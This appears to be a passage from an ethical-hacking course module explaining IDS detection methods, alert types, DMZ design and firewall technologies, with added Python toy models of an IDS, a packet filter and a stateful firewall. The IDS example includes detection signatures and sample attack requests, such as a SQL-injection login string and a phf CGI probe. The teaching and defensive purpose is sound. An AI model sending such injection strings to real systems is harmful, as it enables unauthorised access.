Module Objectives
Adoption of Internet use throughout the business world has boosted network usage in general. Organizations are using various network security measures such as firewalls, intrusion detection system (IDS), intrusion prevention system (IPS), and "honeypots" to protect their networks. Networks are the most preferred targets of hackers for compromising organizations' security, and attackers continue to find new ways to breach network security and attack these targets.
This module provides a deep insight into various network security technologies, such as IDS, firewalls, and honeypots. It explains the operations of these components as well as the multiple techniques attackers use to evade them. This module discusses the various tools and techniques used in evading network security and provides countermeasures necessary to prevent such attacks. It also includes an overview of firewall and IDS pen testing an ethical hacker should follow to increase network security.
At the end of this module, you will be able to:
■ Describe IDS, firewall, and honeypot concepts
■ Use different IDS, firewall and honeypot solutions
■ Explain different techniques to bypass IDS
■ Explain various techniques to bypass firewalls
■ Use different IDS/firewall evading tools
■ Explain different techniques to detect honeypots
■ Apply IDS/firewall evasion countermeasures
■ Perform IDS and firewall penetration testing
IDS, Firewall and Honeypot Concepts
To understand how an attacker evades the security of firewalls, IDSs, and honeypots, the ethical hacker should have an idea about their functions, roles, placement, and design as implemented to protect an organization's network. This section provides an overview of these basic concepts.
Intrusion Detection System (IDS)
An Intrusion Detection System (IDS) is a security software or hardware device used to monitor, detect, and protect networks or systems from malicious activities; it alerts the concerned security personnel immediately upon detecting intrusions. An IDS is highly useful because it continuously monitors both inbound and outbound network traffic and checks for suspicious activities that may indicate a network or system security breach. The IDS checks traffic for signatures that match known intrusion patterns and signals an alarm when a match is detected. An IDS is used to detect intrusions, while an IPS is used to detect and prevent intrusions on the network.
Main Functions of IDS:
■ An IDS gathers and analyzes information from within a computer or a network, to identify the possible violations of security policy, including unauthorized access, as well as misuse.
■ An IDS is also referred to as a "packet-sniffer," which intercepts packets traveling along various communication media and protocols, usually TCP/IP.
■ The packets are analyzed after they are captured.
■ An IDS evaluates traffic for suspected intrusions and signals an alarm after detection.
Where Does the IDS Reside in the Network?
One of the most common places to deploy an IDS is near the firewall. Depending on the traffic to be monitored, the IDS is placed outside or inside the firewall to monitor suspicious traffic originating from outside or inside the network. Placed inside, the IDS will be ideal if it is near a DMZ; however, the best practice is to use a layered defense by deploying one IDS in front of the firewall and another one behind the firewall in the network.
Before deploying the IDS, it is essential to analyze the network topology, understand how traffic flows to and from the resources that an attacker can use to gain access to the network, and identify the critical components that are a likely target of many attacks against the network. Even after deciding the position of the IDS in the network, its configuration determines how effectively it protects the network.
How Does an IDS Work?
The primary purpose of the IDS is to recognize and provide real-time monitoring of intrusions. Additionally, reactive IDSs (and IPSs) can intercept, respond to, and/or prevent intrusions.
An IDS works in the following way:
■ IDSs have sensors to detect malicious signatures in data packets, and some advanced IDSs have behavioral activity detection, to determine malicious traffic behavior. Even if the packet signatures do not match perfectly with the signatures in the IDS signature database, the activity detection system can alert administrators about possible attacks.
■ If the signature matches, the IDS performs predefined actions such as terminating the connection, blocking the IP address, dropping the packet, and/or signaling an alarm to notify the administrator.
■ When a signature matches, anomaly detection is skipped; otherwise, the sensor may analyze traffic patterns for an anomaly.
■ When the packet passes all tests, the IDS will forward it into the network.
The administrator must also be able to identify the methods and techniques used by the intruder and the source of the attack.
How Does an IDS Detect an Intrusion?
An IDS uses three methods to detect intrusion in the network.
■ Signature Recognition
Signature recognition, also known as misuse detection, tries to identify events that indicate an abuse of a system or network. This technique involves first creating models of possible intrusions and then comparing these models with incoming events to make a detection decision. The signatures for IDS were created on the assumption that the model must detect an attack without disturbing normal system traffic. Only attacks should match the model; otherwise, false alarms could occur.
o Signature-based intrusion detection compares incoming or outgoing network packets with the signatures of known attacks, using pattern-matching techniques to detect intrusion. A binary signature can be defined for a specific portion of the packet, such as the TCP flags.
o Signature recognition can detect known attacks. However, there is a possibility that other innocuous packets might also contain the same signature, which will trigger a false positive alert.
o The number of signatures required is huge. The more the signatures, the greater the chances are of the IDS detecting attacks, although traffic may incorrectly match the signatures, thus impeding system performance.
o An increase in the number of signatures in the database could result in the dropping of certain packets.
o A slightly modified variant of a known attack may need entirely new signatures to detect the similar attack.
o Despite problems with signature-based intrusion detection, such systems are popular and work well when configured correctly and monitored closely.
■ Anomaly Detection
Anomaly detection, or "not-use detection," differs from the signature-recognition model. Anomaly detection consists of a database of anomalies. An anomaly can be detected when an event occurs outside the tolerance threshold of normal traffic. Therefore, any deviation from regular use is treated as an attack. Anomaly detection detects the intrusion based on the fixed behavioral characteristics of the users and components in a computer system. Creating a model of normal use is the most challenging task in creating an anomaly detector.
o In the traditional method of anomaly detection, essential data are kept for checking variations in network traffic. However, in reality, there is some unpredictability in network traffic, and there are too many statistical variations, thus making these models imprecise. Some events labeled as anomalies might only be irregularities in network usage.
o In this type of approach, the inability to construct a model thoroughly on a regular network is of concern. These models should be used to check on specific networks.
■ Protocol Anomaly Detection
Protocol anomaly detection depends on the anomalies specific to a protocol. It identifies particular flaws between how vendors deploy the TCP/IP protocol. Protocols are designed according to RFC specifications, which dictate standard handshakes to permit universal communication. The protocol anomaly detector can identify new attacks.
o There are new attack methods and exploits that violate protocol standards.
o The number of malicious anomaly signatures is growing considerably. However, the network protocol, in comparison, is well defined and changing slowly. Therefore, the signature database should frequently be updated to detect attacks.
o Protocol anomaly detectors are different from the traditional IDS in how they present alarms.
General Indications of Intrusions
Intrusion attempts on networks, system, or file systems can be identified by following some general indicators:
■ File System Intrusions
By observing system files, the presence of an intrusion can be identified. System files record the activities of the system. Any modification or deletion of the file attributes or the file itself is a sign that the system was a target of attack:
o If you find new, unknown files/programs on your system, then there is a possibility that the system has been intruded upon. The system can be compromised to the point that it can, in turn, compromise other network systems.
o When an intruder gains access to a system, he or she tries to escalate privileges to gain administrative access. When the intruder obtains Administrator privilege, he/she could change file permissions, for example, from Read-Only to Write.
o Unexplained modifications in file size are also an indication of an attack. Make sure you analyze all of your system files.
o Presence of rogue suid and sgid files on your Linux system that do not match your master list of suid and sgid files could indicate an attack.
o You can identify unfamiliar file names in directories, including executable files with strange extensions and double extensions.
o Missing files are also a sign of a probable intrusion/attack.
■ Network Intrusions
General indications of network intrusions include:
o Sudden increase in bandwidth consumption is an indication of intrusion
o Repeated probes of the available services on your machines
o Connection requests from IPs other than those in the network range, indicating that an unauthenticated user (intruder) is attempting to connect to the network
o Repeated login attempts from remote hosts
o A sudden influx of log data could indicate attempts at Denial-of-Service attacks, bandwidth consumption, and distributed Denial-of-Service attacks
■ System Intrusions
Similarly, general indications of system intrusions include:
o Sudden changes in logs such as short or incomplete logs
o Unusually slow system performance
o Missing logs or logs with incorrect permissions or ownership
o Modifications to system software and configuration files
o Unusual graphic displays or text messages
o Gaps in system accounting
o System crashes or reboots
o Unfamiliar processes
Types of Intrusion Detection Systems
There are two types of intrusion detection systems:
■ Network-Based Intrusion Detection Systems
Network-based intrusion detection systems (NIDSs) check every packet entering the network for the presence of anomalies and incorrect data. By limiting the firewall to drop large numbers of data packets, the NIDS checks every packet thoroughly. A NIDS captures and inspects all traffic. It generates alerts either at the IP or the application-level based on the content. NIDSs are more distributed than host-based IDSs. The NIDS identifies the anomalies at the router and host level. It audits the information contained in the data packets, logging information of malicious packets, and assigns a threat level to each risk after receiving the data packets. The threat level enables the security team to be on alert. These mechanisms typically consist of a black box placed on the network in promiscuous mode, listening for patterns indicative of an intrusion. It detects malicious activity such as Denial-of-Service attacks, port scans, or even attempts to crack into computers by monitoring network traffic.
■ Host-Based Intrusion Detection Systems
In the host-based system, the IDS analyzes each system's behavior. Host-Based Intrusion Detection Systems (HIDSs) can be installed on any system ranging from a desktop PC to a server. The HIDS is more versatile than the NIDS. In addition to detecting unauthorized insider activity, host-based systems are also effective at detecting unauthorized file modification. HIDSs focus on the changing aspects of local systems. The HIDS is also more platform centric, with more focus on the Windows OS, but there are other HIDSs for UNIX platforms. These mechanisms usually include auditing events that occur on a specific host.
These are not as common, because of the overhead they incur by having to monitor each system event.
Organization networks also use two other IDS systems.
Log File Monitoring
A log file monitor (LFM) monitors log files created by network services. The LFM IDS searches through the logs and identifies malicious events. In a similar manner to NIDS, these systems look for patterns in the log files that suggest an intrusion. A typical example would be parsers for HTTP server log files that look for intruders who try well-known security holes, such as the "phf" attack. LFM tools, like "Swatch," for example, are typically programs that parse log files after an event has already occurred, such as failed login attempts.
File Integrity Checking
These mechanisms check for Trojan horses, or modified files, indicating the presence of an intruder. Tripwire is an example of a file integrity checking tool.
Types of IDS Alerts
An IDS generates four types of alerts which include: True Positive, False Positive, False Negative and True Negative.
■ True Positive (Attack - Alert): A true positive is a condition occurring when an event triggers an alarm and causes the IDS to react as if a real attack is in progress. The event may be an actual attack, in which case an attacker is making an attempt to compromise the network, or it may be a drill, in which case security personnel are using hacker tools to conduct tests of a network segment.
■ False Positive (No attack - Alert): A false positive occurs if an event triggers an alarm when no actual attack is in progress. A false positive occurs when an IDS treats regular system activity as an attack. False positives tend to make users insensitive to alarms and reduce their reactions to actual intrusion events. While testing the configuration of an IDS, administrators use false positives to determine if the IDS can distinguish between false positives and real attacks or not.
■ False Negative (Attack - No Alert): A false negative is a condition occurring when an IDS fails to react to an actual attack event. This is the most dangerous failure, since the purpose of an IDS is to detect and respond to attacks.
■ True Negative (No Attack - No Alert): A true negative is a condition occurring when an IDS identifies an activity as acceptable behavior and the activity is indeed acceptable. A true negative is the successful ignoring of acceptable behavior. It is not harmful, as the IDS is performing as expected.
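To make the signature and anomaly methods and the four alert outcomes concrete, here is an added example (not part of the original module) that runs a toy signature-plus-anomaly inspector over constructed sample packets and scores each decision against a known ground truth; the signatures, baseline sizes and traffic are all constructed for illustration, and the "phf" pattern is the old CGI hole the text mentions.

```python
import re
import statistics
from collections import Counter
from dataclasses import dataclass
from typing import Optional


@dataclass(frozen=True)
class Packet:
    src: str
    dst_port: int
    payload: bytes
    malicious: bool  # ground-truth label, used only to score the IDS


# Signature recognition (misuse detection): byte patterns of known attacks.
# Constructed for this example; "phf" is the classic CGI hole the text cites.
SIGNATURES = {
    "phf-cgi": re.compile(rb"/cgi-bin/phf"),
    "sqli-tautology": re.compile(rb"'\s*or\s+1\s*=\s*1", re.IGNORECASE),
    "dir-traversal": re.compile(rb"\.\./\.\./"),
}

# Anomaly detection: a baseline of normal request sizes (constructed), and
# the tolerance outside which a request is considered anomalous.
BASELINE_SIZES = [180, 210, 195, 240, 205, 220, 190, 230, 215, 200]
TOLERANCE_STDDEVS = 3.0


def anomaly_threshold(sizes=BASELINE_SIZES, k=TOLERANCE_STDDEVS) -> float:
    """Requests larger than mean + k*stdev fall outside normal behaviour."""
    return statistics.mean(sizes) + k * statistics.stdev(sizes)


def inspect(pkt: Packet, threshold: float) -> Optional[str]:
    """Return an alert name, or None when the packet passes every test.

    Signatures are checked first; the anomaly test runs only when no
    signature matched, which is the order the text describes."""
    for name, pattern in SIGNATURES.items():
        if pattern.search(pkt.payload):
            return f"signature:{name}"
    if len(pkt.payload) > threshold:
        return "anomaly:oversized-request"
    return None


def classify(alerted: bool, malicious: bool) -> str:
    """Map (alert raised?, real attack?) onto the four alert outcomes."""
    if malicious:
        return "true_positive" if alerted else "false_negative"
    return "false_positive" if alerted else "true_negative"


def score(packets, threshold: Optional[float] = None) -> dict:
    """Count how the IDS decisions fall into TP / FP / FN / TN."""
    if threshold is None:
        threshold = anomaly_threshold()
    counts = Counter(classify(inspect(p, threshold) is not None, p.malicious)
                     for p in packets)
    return dict(counts)


# Constructed sample traffic with its ground truth.
SAMPLE = [
    Packet("10.0.0.5", 80, b"GET /index.html HTTP/1.1\r\nHost: www\r\n\r\n", False),
    Packet("198.51.100.7", 80, b"GET /cgi-bin/phf?Qname=x HTTP/1.0\r\n\r\n", True),
    Packet("198.51.100.9", 80, b"POST /login user=admin' OR 1=1-- HTTP/1.1", True),
    # Innocuous text that happens to contain a signature: a false positive.
    Packet("10.0.0.6", 80, b"POST /wiki body=Use ../../ to go up two levels", False),
    # Known attack slightly altered so no signature matches: a false negative.
    Packet("198.51.100.9", 80, b"POST /login user=admin' OR 2>1-- HTTP/1.1", True),
    # Oversized request with no known signature: caught only by the anomaly test.
    Packet("198.51.100.11", 80, b"GET /" + b"A" * 400 + b" HTTP/1.1", True),
]

if __name__ == "__main__":
    t = anomaly_threshold()
    for p in SAMPLE:
        alert = inspect(p, t)
        print(f"{p.src:>14} {alert!s:28} {classify(alert is not None, p.malicious)}")
    print(score(SAMPLE))
```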
Firewall
A firewall is a software- or hardware-based system located at the network gateway that protects the resources of a private network from unauthorized access by users on other networks. Firewalls are placed at the junction or gateway between two networks, usually a private network and a public network such as the Internet. They examine all messages entering or leaving the intranet and block those that do not meet the specified security criteria. Firewalls may be concerned with the type of traffic or with the source or destination addresses and ports. They include a set of tools that monitor the flow of traffic between networks. A firewall placed at the network level and working closely with a router filters all network packets to determine whether or not to forward them toward their destinations. Firewalls should be installed away from the rest of the network, so that no incoming request can get direct access to a private network resource. If appropriately configured, the firewall protects systems on one side of it from systems on the other side.
■ A firewall is an intrusion detection mechanism that is configured according to each organization's security policy. Its settings can be changed to make appropriate changes to its functionality.
■ Firewalls can be configured to restrict incoming traffic to POP and SMTP and to enable email access. Certain firewalls block specific email services to secure against spam.
■ A firewall can be configured to check inbound traffic at a "checkpoint," where a security audit is performed. It can also act as an active "phone tap" tool for identifying an intruder's attempt to dial into modems in a secured network. Firewall logs consist of logging information that reports to the administrator all attempts to access various services.
■ The firewall verifies the incoming and outgoing traffic against firewall rules and acts as a router to move data between networks. Firewalls allow or deny access requests made from one side of the firewall to services on the other side.
■ Firewalls identify all the attempts to log into the network for auditing. Unauthorized attempts can be identified by embedding an alarm that is triggered when an unauthorized user attempts to log in. Firewalls can filter packets based on address and type of traffic. They recognize the source and destination addresses and port numbers when address filtering, and they identify types of network traffic when protocol filtering. Firewalls can identify the state and attributes of data packets.
Firewall Architecture
Firewall architecture consists of the following elements:
■ Bastion Host
A bastion host is designed for defending the network against attacks. It acts as a mediator between inside and outside networks. A bastion host is a computer system designed and configured to protect network resources from attack. Traffic entering or leaving the network passes through the firewall; it has two interfaces:
o Public interface directly connected to the Internet
o Private interface connected to the intranet
■ Screened Subnet
A screened subnet (DMZ) is a protected network created with a two- or three-homed firewall behind a screening firewall; "screened subnet" is a name commonly used to refer to the DMZ. When using a three-homed firewall, connect the first interface to the Internet, the second interface to the DMZ, and the third to the intranet. The DMZ responds to public requests and has no hosts accessed by the private network. Internet users cannot access the private zone.
The advantage of screening a subnet away from the intranet is that public requests can be responded to without allowing traffic into the intranet. A disadvantage of the three-homed firewall is that if it is compromised, both the DMZ and the intranet could also be compromised. A safer technique is to use multiple firewalls to separate the Internet from the DMZ, and then to separate the DMZ from the intranet.
■ Multi-homed Firewall
A multi-homed firewall is a node with multiple NICs that connects to two or more networks. It connects each interface to the separate network segments logically and physically. A multi-homed firewall helps in increasing efficiency and reliability of an IP network. In the multi-homed firewall, more than three interfaces are present that allow for further subdividing the systems based on the specific security objectives of the organization. However, the model that adds depth of protection is the back-to-back firewall.
DeMilitarized Zone (DMZ)
In computer networks, the DeMilitarized Zone (DMZ) is an area that hosts computer(s) or a small sub-network placed as a neutral zone between a particular company's internal network and untrusted external network to prevent outsider access to a company's private data. The DMZ serves as a buffer between the secure internal network and the insecure Internet, as it adds a layer of security to the corporate LAN, thus preventing direct access to other parts of the network.
A DMZ is created using a firewall with three or more network interfaces assigned specific roles, such as an internal trusted network, a DMZ network, or an external untrusted network (Internet). Any service such as mail, web, and FTP that provides access to external users can be placed in the DMZ. Web servers that communicate with database servers, however, cannot reside in the DMZ, as doing so could give outside users direct access to sensitive information. There are many ways in which the DMZ can be configured, according to specific network topologies and company requirements.
Types of Firewalls
There are two types of firewalls.
■ Hardware Firewall
A hardware firewall is a dedicated firewall device placed on the perimeter of the network. It is an integral part of the network setup and is also built into broadband routers or sold as a standalone product. A hardware firewall helps to protect systems on the local network, and it is effective with little to no configuration. It employs a technique of packet filtering: it reads the header of a packet to find out the source and destination address and compares it with a set of predefined and/or user-created rules that determine whether it should forward or drop the packet. A hardware firewall functions on an individual system or a particular network connected using a single interface. Examples of hardware firewalls are Cisco ASA, Fortigate, etc. Hardware firewalls protect the private local area network but are expensive to implement and upgrade.
Advantages:
o Security: A hardware firewall with its operating system (OS) is considered to reduce the security risks and has increased the level of security controls.
o Speed: Hardware firewalls initiate faster responses and enable more traffic.
o Minimal Interference: Since a hardware firewall is a separate network component
Disadvantages:
o More expensive than a software firewall.
o Hard to implement and configure.
o Consumes more space and involves cabling.
■ Software Firewall
A software firewall is similar to a filter. It sits between the regular application and the networking components of the OS. It is more helpful for individual home users, is suitable for mobile users who need digital security working outside of the corporate network and it is easy to install on an individual's PC, notebook, or workgroup server. It helps protect your system from outside attempts of unauthorized access and protects against everyday Trojans and email worms. It includes privacy controls and web filtering and more. A software firewall implants itself in the critical area of the application/network path. It analyzes data flow against the rule set.
The configuration of a software firewall is simple compared to a hardware firewall. It intercepts all requests from the network to the computer to determine if they are valid, and protects the computer from illicit attacks that try to access it. It applies user-defined rules and consumes more system resources than a hardware firewall, which reduces the speed of the system. Examples of software firewalls are produced by Norton, McAfee, and Kaspersky, among others.
Advantages:
o Less expensive than hardware firewalls.
o Ideal for personal or home use.
o Easier to configure and reconfigure.
Disadvantages:
o Consumes system resources.
o Difficult to un-install firewalls.
o Not appropriate for environments requiring faster response times.
Firewall Technologies
Firewalls are designed and developed with the help of different firewall services. Each firewall service provides security depending on their efficiency and sophistication. There are different types of firewall technologies, depending on where the communication is taking place, where traffic is intercepted in the network, the state that it traces, and so on. Taking into account the capabilities of the different firewalls offered, it is easy to choose and place an appropriate firewall to meet security requirements in the best possible way. Each type of firewall has its advantages. Several firewall technologies are available for organizations to implement their security. Sometimes, firewall technologies are combined with other technologies to build another firewall technology. For example, NAT is a routing technology, but when combined with a firewall, it is considered a firewall technology instead.
Listed below are various firewall technologies:
■ Packet Filtering
■ Circuit Level Gateways
■ Application Level Firewall
■ Stateful Multilayer Inspection
■ Application Proxies
■ Virtual Private Network
■ Network Address Translation
The security level of these technologies varies according to the efficiency level of each technology. These technologies can be compared by the OSI layer at which they operate between the hosts. The data passes through the intermediate layers from a higher layer to a lower layer. Each layer adds additional information to the data packets. The lower layer then sends the obtained information through the physical network to the upper layers of the destination.
Packet Filtering Firewall
In a packet filtering firewall, each packet is compared to a set of criteria before it is forwarded. Depending on the packet and the criteria, the firewall can drop the packet, forward it, or send a message to the originator. Rules can include the source and destination IP address, the source and destination port number, and the protocol used. It works at the Internet Protocol (IP) layer of the TCP/IP model or the network layer of the OSI model. Packet filter-based firewalls concentrate on individual packets, analyze their header information, and determine which way they need to be directed. Traditional packet filters make this decision according to the following information in a packet:
■ Source IP address: Used to check if the packet is coming from a valid source or not. The source IP address can be found in the IP header of the packet, which indicates the source system address.
■ Destination IP address: Used to check if the packet is going to the correct destination and whether the destination accepts these types of packets. The destination IP address can be found in the IP header of the packet, which carries the destination address.
■ Source TCP/UDP port: This is used to check the source port of the packet
■ Destination TCP/UDP port: This is used to monitor the destination port, regarding the services to be allowed and the services to be denied.
■ TCP flag bits: Used to check whether the packet has the SYN, ACK, or other bits set for the connection to be made.
■ Protocol in use: Used to check whether the protocol that the packet is carrying should be allowed.
■ Direction: Used to check whether the packet is entering or leaving the private network.
■ Interface: Used to check whether or not the packet is coming from an unreliable zone.
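As an added illustration that is not the module's own material, the Python below evaluates the header fields just listed against a small constructed rule set in first-match order; the address ranges, interface names and rules are assumptions for the example. Its last sample packet shows the limitation that motivates stateful inspection: a stateless filter cannot tell an unsolicited ACK from the reply of a legitimate session.

```python
from dataclasses import dataclass
from ipaddress import ip_address, ip_network
from typing import FrozenSet, Optional, Tuple


@dataclass(frozen=True)
class Packet:
    src: str
    dst: str
    proto: str              # "tcp", "udp" or "icmp"
    sport: int
    dport: int
    flags: FrozenSet[str]   # TCP flag names set in the header; empty for non-TCP
    direction: str          # "in" = entering the private network, "out" = leaving it
    iface: str              # interface the packet arrived on


@dataclass(frozen=True)
class Rule:
    """One filtering rule; None (or an empty flag set) means 'match anything'."""
    action: str                              # "allow" or "deny"
    src: str = "0.0.0.0/0"                   # CIDR of permitted source addresses
    dst: str = "0.0.0.0/0"                   # CIDR of permitted destination addresses
    proto: Optional[str] = None
    sport: Optional[Tuple[int, int]] = None  # inclusive source port range
    dport: Optional[Tuple[int, int]] = None  # inclusive destination port range
    flags: FrozenSet[str] = frozenset()      # TCP flags that must be set
    no_flags: FrozenSet[str] = frozenset()   # TCP flags that must be clear
    direction: Optional[str] = None
    iface: Optional[str] = None
    comment: str = ""

    def matches(self, p: Packet) -> bool:
        def in_range(rng, port):
            return rng is None or rng[0] <= port <= rng[1]

        return (ip_address(p.src) in ip_network(self.src)
                and ip_address(p.dst) in ip_network(self.dst)
                and (self.proto is None or self.proto == p.proto)
                and in_range(self.sport, p.sport)
                and in_range(self.dport, p.dport)
                and self.flags <= p.flags
                and not (self.no_flags & p.flags)
                and (self.direction is None or self.direction == p.direction)
                and (self.iface is None or self.iface == p.iface))


# Constructed topology: eth0 faces the untrusted zone, eth1 the private network.
INTERNAL = "10.0.0.0/8"
WEB_SERVER = "10.0.5.10/32"
UNTRUSTED, TRUSTED = "eth0", "eth1"

RULES = [
    # Anti-spoofing: an internal source address must never arrive from outside.
    Rule("deny", src=INTERNAL, direction="in", iface=UNTRUSTED,
         comment="internal source address arriving on the untrusted interface"),
    # New connections from outside are accepted only to the web server's HTTPS port.
    Rule("allow", dst=WEB_SERVER, proto="tcp", dport=(443, 443),
         flags=frozenset({"SYN"}), no_flags=frozenset({"ACK"}), direction="in",
         comment="new HTTPS connection to the web server"),
    # Without connection state, replies to sessions opened from inside can only be
    # recognised by their flag bits (ACK set, SYN clear).
    Rule("allow", proto="tcp", direction="in",
         flags=frozenset({"ACK"}), no_flags=frozenset({"SYN"}),
         comment="presumed reply to a connection opened from inside"),
    Rule("allow", src=INTERNAL, direction="out", iface=TRUSTED,
         comment="traffic leaving the private network"),
]
DEFAULT_ACTION = "deny"   # implicit final rule: whatever matched nothing is dropped


def filter_packet(p: Packet, rules=RULES) -> Tuple[str, str]:
    """First matching rule wins; return its action and comment."""
    for rule in rules:
        if rule.matches(p):
            return rule.action, rule.comment
    return DEFAULT_ACTION, "no rule matched (default policy)"


# Constructed sample packets.
SAMPLE = {
    "new_https": Packet("203.0.113.5", "10.0.5.10", "tcp", 52000, 443,
                        frozenset({"SYN"}), "in", UNTRUSTED),
    "new_ssh": Packet("203.0.113.5", "10.0.5.10", "tcp", 52001, 22,
                      frozenset({"SYN"}), "in", UNTRUSTED),
    "spoofed_internal": Packet("10.0.0.9", "10.0.5.10", "tcp", 52002, 443,
                               frozenset({"SYN"}), "in", UNTRUSTED),
    "outbound_dns": Packet("10.0.0.9", "203.0.113.53", "udp", 40000, 53,
                           frozenset(), "out", TRUSTED),
    # No session exists for this ACK, yet the stateless filter must let it through.
    "unsolicited_ack": Packet("203.0.113.5", "10.0.5.10", "tcp", 52003, 8080,
                              frozenset({"ACK"}), "in", UNTRUSTED),
}

if __name__ == "__main__":
    for name, pkt in SAMPLE.items():
        action, why = filter_packet(pkt)
        print(f"{name:18} {action:5} {why}")
```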
Circuit-Level Gateway Firewall
A circuit-level gateway firewall works at the session layer of the OSI model or the TCP layer of TCP/IP. It forwards data between networks without verifying it; it blocks incoming packets into the host but allows the traffic to pass through itself. Information passed to remote computers through a circuit-level gateway will appear to have originated from the gateway, as the incoming traffic carries the IP address of the proxy (circuit-level gateway). Circuit-level gateways monitor requests to create sessions and determine if those sessions will be allowed.
A circuit-level gateway gives controlled access to network services and host requests. To detect whether or not a requested session is valid, it checks the TCP handshaking between packets. Circuit proxy firewalls allow or prevent data streams; they do not filter individual packets. They are relatively inexpensive and hide the information about the private network that they protect.
Application-Level Firewall
Application-based proxy firewalls concentrate on the application layer rather than just the packets. Application-level gateways (proxies) can filter packets at the application layer of the OSI model (or the application layer of TCP/IP). Incoming and outgoing traffic is restricted to the services supported by the proxy; all other service requests are denied. The need for application-level firewalls arises because the tremendous amount of voice, video, and collaborative traffic carried at the data-link and network layers can be utilized for unauthorized access to internal and external networks. Application-level gateways configured as a web proxy prohibit FTP, gopher, telnet, or other traffic. Application-level gateways examine traffic and filter on application-specific commands such as HTTP POST and GET.
Traditional firewalls are unable to filter such types of traffic. Application-level firewalls can inspect, find, and verify malicious traffic that is missed by stateful inspection firewalls, decide whether to allow it access, and so improve the overall security of the application layer. For example, worms that send malicious code over legitimate protocols cannot be detected by stateful firewalls, as those firewalls concentrate on packet headers at the network layer. However, deep packet inspection firewalls can find such attacks with the help of informative signatures added inside packets. Some of the features of application-level firewalls:
■ They analyze the application information to make decisions about whether to permit traffic.
■ Being proxy-based, they can permit or deny traffic according to the authenticity of the user or process involved.
■ A content-caching proxy optimizes performance by caching frequently accessed information rather than sending new requests to the servers for the same old data.
Application-layer firewalls can function in one of two modes: active or passive.
■ Active application-level firewalls: They examine all incoming requests, including the actual message content exchanged, against known vulnerabilities such as SQL injection, parameter and cookie tampering, and cross-site scripting. The requests deemed genuine are allowed to pass through.
■ Passive application-level firewalls: They work similarly to an IDS, in that they also check all incoming requests against known vulnerabilities, but they do not actively reject or deny those requests if a potential attack is discovered.
Stateful Multilayer Inspection Firewall
Stateful multilayer inspection firewalls combine the aspects of the other three types of firewalls (Packet Filtering, Circuit Level Gateways, and Application Level Firewall). They filter packets at the network layer of the OSI model (or the IP layer of TCP/IP), to determine whether session packets are legitimate, and they evaluate the contents of packets at the application layer.
With the use of stateful packet filtering, you can overcome the limitation of packet firewalls that can only filter on IP address, port, and protocol, and so on. This multilayer firewall can perform deep packet inspection.
Features of the Stateful Multilayer Inspection Firewall:
■ This type of firewall can remember the packets that passed through it earlier and make decisions about future packets based on the state of the conversation.
■ These firewalls provide the best of both packet filtering and application-based filtering.
■ Cisco PIX firewalls are stateful.
■ These firewalls track and log slots or translations.
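The tracker below is an added example (not the module's or any vendor's code) of what the "remembering" in stateful inspection amounts to: it follows the TCP handshake of connections opened from inside, accepts later packets only when they match a tracked connection, and expires idle entries, so an unsolicited inbound ACK that a stateless filter would have to pass is dropped here. The hosts, ports and clock are constructed.

```python
from dataclasses import dataclass
from typing import Dict, FrozenSet, List, Tuple


@dataclass(frozen=True)
class Packet:
    src: str
    sport: int
    dst: str
    dport: int
    flags: FrozenSet[str]   # subset of {"SYN", "ACK", "FIN", "RST"}
    direction: str          # "out" = leaving the private network, "in" = entering it
    t: float = 0.0          # arrival time in seconds on a constructed clock


# A connection is keyed from the inside host's point of view so that both
# directions of the same conversation share one state-table entry.
ConnKey = Tuple[str, int, str, int]   # (inside host, inside port, outside host, outside port)


class StatefulFirewall:
    """Tracks TCP connections opened from inside; inbound packets are accepted
    only when they belong to a connection the firewall has already seen."""

    IDLE_TIMEOUT = 300.0   # seconds without traffic before an entry is purged

    def __init__(self) -> None:
        self.table: Dict[ConnKey, Tuple[str, float]] = {}   # key -> (state, last seen)

    @staticmethod
    def key(p: Packet) -> ConnKey:
        if p.direction == "out":
            return (p.src, p.sport, p.dst, p.dport)
        return (p.dst, p.dport, p.src, p.sport)

    def _expire(self, now: float) -> None:
        stale = [k for k, (_, seen) in self.table.items()
                 if now - seen > self.IDLE_TIMEOUT]
        for k in stale:
            del self.table[k]

    def process(self, p: Packet) -> str:
        """Decide 'allow' or 'drop' for one packet and update the state table."""
        self._expire(p.t)
        k = self.key(p)
        state = self.table[k][0] if k in self.table else None
        f = p.flags

        # A reset on a tracked connection tears it down.
        if "RST" in f and state is not None:
            del self.table[k]
            return "allow"
        # Three-way handshake, initiated from the inside only.
        if p.direction == "out" and f == {"SYN"} and state is None:
            self.table[k] = ("SYN_SENT", p.t)
            return "allow"
        if p.direction == "in" and f == {"SYN", "ACK"} and state == "SYN_SENT":
            self.table[k] = ("SYN_RECEIVED", p.t)
            return "allow"
        if p.direction == "out" and "ACK" in f and state == "SYN_RECEIVED":
            self.table[k] = ("ESTABLISHED", p.t)
            return "allow"
        # Data and teardown on an established connection, in either direction
        # (the final ACK of the FIN exchange is not modelled).
        if state in ("ESTABLISHED", "CLOSING") and "SYN" not in f:
            if "FIN" in f and state == "CLOSING":
                del self.table[k]                 # both sides have sent FIN
            elif "FIN" in f:
                self.table[k] = ("CLOSING", p.t)
            else:
                self.table[k] = (state, p.t)      # refresh last-seen time
            return "allow"
        # Everything else: unsolicited inbound SYNs, ACKs for unknown
        # connections, packets on expired entries.
        return "drop"


def run_scenario() -> List[str]:
    """Constructed trace: inside host 10.0.0.9 opens HTTPS to 203.0.113.5."""
    fw = StatefulFirewall()
    a, b = "10.0.0.9", "203.0.113.5"
    trace = [
        Packet(a, 51000, b, 443, frozenset({"SYN"}), "out", 0.0),
        Packet(b, 443, a, 51000, frozenset({"SYN", "ACK"}), "in", 0.1),
        Packet(a, 51000, b, 443, frozenset({"ACK"}), "out", 0.2),
        Packet(b, 443, a, 51000, frozenset({"ACK"}), "in", 1.0),      # reply data
        Packet(b, 443, a, 51001, frozenset({"ACK"}), "in", 2.0),      # no such connection
        Packet(b, 40000, a, 22, frozenset({"SYN"}), "in", 3.0),       # unsolicited inbound SYN
        Packet(a, 51000, b, 443, frozenset({"ACK"}), "out", 400.0),   # idle longer than the timeout
    ]
    return [fw.process(p) for p in trace]


if __name__ == "__main__":
    print(run_scenario())
```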
Application Proxy
